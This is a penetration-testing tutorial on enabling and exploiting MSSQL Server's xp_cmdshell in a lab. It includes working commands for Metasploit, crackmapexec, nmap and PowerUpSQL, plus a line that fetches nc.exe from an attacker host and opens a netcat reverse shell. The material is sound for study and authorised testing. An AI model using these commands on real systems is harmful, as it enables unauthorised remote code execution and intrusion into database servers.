This article is in collection with the other two articles that we wrote about MSSQL Server and its Penetration Testing. In this article, we will be discovering and exploiting the security aspects of the xp_cmdshell functionality.
Table of Content
· Introduction
o What is xp_cmdshell?
· Enabling xp_cmdshell
o Manually (GUI)
o sqsh
o mssqlclient.py
o Metasploit
· Exploiting xp_cmdshell:
o Metasploit
o Netcat
o Crackmapexec
o Nmap
o PowerUpSQL
· Conclusion
Introduction
All the demonstrations in this article will be presented on the MSSQL Server. To get the MS-SQL server set up, you can refer to our article: Penetration Testing Lab Setup: MS-SQL. We previously touched on the exploitation of the xp_cmdshell Functionality with the help of the Metasploit module: exploit/windows/mssql/mssql_payload in our article: MSSQL Penetration Testing with Metasploit. Although in that article we couldn’t explain the background of the xp_cmdshell functionality and its security aspect.
What is xp_cmdshell?
According to the Official Microsoft Documentations, xp_cmdshell is functionality that spawns a Windows command shell and passes in a string for execution. Any output that is generated by it is shown in the format of rows of text. To simplify, we can say that it allows the database administrators to access and execute any external process directly from the SQL Server. The implementation of the xp_cmdshell can be traced back to SQL Server 6.5. It was designed so that the developers can use the SQL queries with the system command to automate various tasks that would require additional programming and working. Now that we have some knowledge about the xp_cmdshell, we can see how it can be enabled on an SQL server.
Enabling xp_cmdshell: Manually (GUI)
The functionality of xp_cmdshell is disabled by default. To use it we need to enable it. It requires a higher privilege to enable on an SQL server. In the demonstration below, we are using the credentials of the SA user to log in on the SQL Server.
Now that we have the SQL instance running as Administrator, we need to access the Object Explorer section. Here, we have the SQL Server Instance, we right-click on the instance to find a drop-down menu. We need to choose the “Facets” option from this menu as demonstrated below.
Clicking on the Facets option will open a new window. It will have a field with the various types of facets available. We need to choose the Surface Area Configuration facets from the drop-down menu as shown in the image below.
After choosing the surface area configuration facet. We can see that we have the XPCmdShellEnabled option set as false.
Clicking on the XP command shell option, we change its value from false to true as shown in the figure below. This was the demonstration of how to enable XP command shell using the graphical user interface on a Windows MSSQL Server.
Enabling xp_cmdshell: sqsh
Next, we will be using the SQ SH tool on our Kali machine. To check for if the. XP command shell option has been enabled on the target machine or not. The syntax for using this tool is quite simple, first sqsh with the -S and the Target IP address followed by -C with the user name of the server admin and -P with the password for that particular user as shown in the image below.
sqsh -S 192.168.1.146 -U sa -P "Password@1"
xp_cmdshell 'whoami';
go
As we could observe from the image that the SQL Server had blocked access to the procedure command shell. So we will work on enabling it now. To enable the XP command shell on the target machine using SQSH we will be running a series of commands that would firstly show the advanced options that are available within the SP configuration option. Then we will choose to execute the XP command shell option and activate it, and finally, we will run the reconfigure command that will enable the XP commercial option on the target machine as shown in the image given below.
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
xp_cmdshell 'whoami';
go
This activity can be verified by checking in a similar way that we did with the GUI option as before.
Enabling xp_cmdshell: mssqlclient.py
Moving on to the next tool that we can use with this kind of activity is the mssqlclient.py Python script that is part of the Impact toolkit. To use mssqlclient.py, we will need to specify the username, domain, password, the target IP address, and the Port that is hosting the Ms SQL service as shown in the image. We can see that first a connection is established then it is switched to the TLS negotiation Followed by the packet size that is changed from 4096 to 16192. Then we can see that the impact was able to get the SQL Express command shell, where it changes the database context to master and the language setting to US_English. Here we can get a banner that says that we can run the help command to get the extra shell commands. Then we can use the command enable_xp_cmdshell to enable the XP command shell functionality on the target machine.
python3 mssqlclient.py WORKGROUP/sa:Password@1@192.168.1.146 -port 1433
enable_xp_cmdshell
Again, we can verify it in a similar way that we did with the GUI approach and the sqsh approach. Here we can see that we were able to enable the XP command shell functionality with the help of mssqlclient which is a part of the Impact toolkit.
mssqlclient is not done. We can also use mssqlclient to enable XP command shell functionality on the target machine. If we have the user credentials with the appropriate permissions that can do so, we can just use the -windows-auth parameter that will tell the target machine to log in as the user and then enable the XP command shell functionality on the target machine as shown in the image below.
python3 mssqlclient.py administrator:'ignite@987'@192.168.1.146 -windows-auth
enable_xp_cmdshell
Enabling xp_cmdshell: Metasploit
Metasploit can also be helpful if we want to enable the XP command shell functionality. For this, we will have to use the exploit/windows/mssql/mssql_payload Exploit. This exploit requires a couple of options, such as setting the rhost which contains the IP address of the target machine, the password to access that particular machine. To approach the target machine and run particular commands on it, it first enables the XP command shell functionality on the target machine.
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.146
set password Password@1
exploit
The exploit does not stop at just enabling the XP command shell. It then runs a series of commands that can help to get us a meterpreter shell on the target machine as shown in the image below.
Exploiting xp_cmdshell: Metasploit
In case you don’t want to get the meterpreter on the target machine, instead just want to present a proof of concept for the vulnerability of the target machine, you can use another exploit which is. Auxiliary/admin/mssql/mssql_exec this particular exploit also requires few options such as rhost which contains the IP address of the target machine, the password for accessing the target machine, and cmd for setting the particular command that you want to run on the target machine. In the demonstration, we will just run the IP config command to show that we can run any system commands on the target machine with the help of this exploit.
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.146
set password Password@1
set cmd “ipconfig”
exploit
Exploiting xp_cmdshell: Netcat
As we discussed earlier, the XP command shell can run system commands and access system resources on the target machine. We can use it to get a reverse connection on the target machine. To do so, we first need to transfer the netcat binary file to the Windows machine. For this, we will use the nc.exe executable. This file is located at /usr/share/windows-binaries. Then we can use the Python one-liner to create an HTTP service.
cd /usr/share/windows-binaries
ls -al
python -m SImpleHTTPServer 80
Moving on to the XP command shell, we just use the powershell.exe cmdlet to invoke PowerShell and then use the wget command to access that particular file that we just hosted. Then we will transfer this particular file into the C:/Users/Public directory, which has the access to write. Then we will use the XP command shell to execute the netcat binary to run cmd.exe. To the creating a reverse connection to the host Kali Machine on Port 4444.
xp_cmdshell "powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\\Users\Public\\nc.exe"
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.2 4444"
We will, however, create a netcat listener on the Kali machine before running the previous command of generating a reverse connection. This listener well captured the shell as soon as the command is executed and, a session is generated. Here we can see that upon running the whoami command on the shell, we find that the shell that we have is for the NT service\mssql$sqlexpress user.
nc -lvp 4444
whoami
Exploiting xp_cmdshell: Crackmapexec
Another method to get a reverse connection on the target machine from the Ms SQL XP command Shell functionality is by using its ability to run system commands associated with the web_delivery payload. The process is quite simple, we just use the exploit/multi/script/web_delivery exploit, set the target as the Windows machine then set the payload as windows/meterpeter/reverse_tcp. then set the local host to the IP address of the kali machine. Finally, we will run the exploit command. This would create a payload and host that particular payload on a port that in our case is 8080.
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/revese_tcp
set lhost 192.168.1.2
exploit
Now to get this particular payload downloaded and run on the target machine. We will take the help of the crackmapexac tool with Ms SQL protocol running with the IP address of the target machine with the username Ignite. And the password for that particular user also, stating the payload method as web_delivery with the URL that the web_delivery payload generated as shown in the image below. After running the crackmapexac would show that the target has been pawned.
crackmapexec mssql 192.168.1.146 -u 'ignite' -p 'Password@123' -M web_delivery -o URL=http://192.168.1.2:8080/om6cxs3B
When the crackmapexec shows that the target has been pawned, we can go back to the Metasploit shell and find that the target has been exploited successfully and we have a meterpreter shell on the target machine.
Exploiting xp_cmdshell: Nmap
Next, we will be using the nmap tool to enumerate that the particular target that we are attacking has enabled the XP command shell functionality with the help of a script scan with the script as ms-sql-xp-cmdshell. We can also provide the script arguments which contain the username for that Ms SQL database user and the password for that particular user. After that we can also provide the command that we want to run on the target machine in case, the XP command shell functionality is enabled on the target machine. In the demonstration below, we tried to run the net user command on the target machine as we can see from the image that the target machine had the XP command shell functionality enabled and the nmap was able to run the Net user command successfully on the target machine showing that the target machine has users such as administrator and Ignite.
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.passsword=Password@1,ms-sql-xp-cmdshell.cmd=’net user’ 192.168.1.146
Exploiting xp_cmdshell: PowerUpSQL
Last but not the least, we will be using the PowerUpSQL tool on the Windows machine to use this particular tool. We have downloaded the power of SQL directly from its GitHub repository. Then we have opened up a cmd shell on that machine, we can directly use the PowerShell on the machine as well. Since we have the cmd shell, we run the powershell command to get the PowerShell on the machine. Next, we will be using the EP i.e., execution policy bypass so that we can import the PowerShell script of the PowerUpSQL. Now that we have access to importing and executing the scripts on the machine. We can use the Import-Module cmdlet to import the PowerShell. Script. Then use the Invoke-SQLOSCmd command with parameters such as username, a password containing the credential for the database user. Followed by the instance that we want to run that particular command in. In our case, it is the SQL Express. Then we have the command that we want to run, which here we have selected The whoami command. Again, after executing this particular command first, the tool PowerUpSQL tries to connect with the database, after the connection is successful, it checks if the user credentials that we have provided are for sysadmin or the users that we have provided have sysadmin access or not, then it runs the commands in a similar way that we did earlier with sqsh. It first enables the advanced options and then tries to enable the XP command shell functionality. Here, in this demonstration, the XP commands functionality is already enabled, so the tool just moves on to run the whoami command which shows that we are the user and nt service/MSSQL$sqlexpress user.
cd PowerUPSQL-master
powershell -ep bypass
Import-Module .\PowerUpSQL.psq
Invoke-SQLOSCmd -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS –Command whoami –Verbose
Conclusion
This article was designed to provide the users with possible content that can help them whenever they want to perform penetration testing on Ms SQL Server where there is a chance that they could enable the XP command shell functionality or the XP command shell functionality already enabled. The point of this article is not to speculate on how the user can get the credentials or how they were able to elevate its sysadmin access but, when or if the user was able to get those privileges, they can move on to extract and execute multiple commands on the target system and do more damage.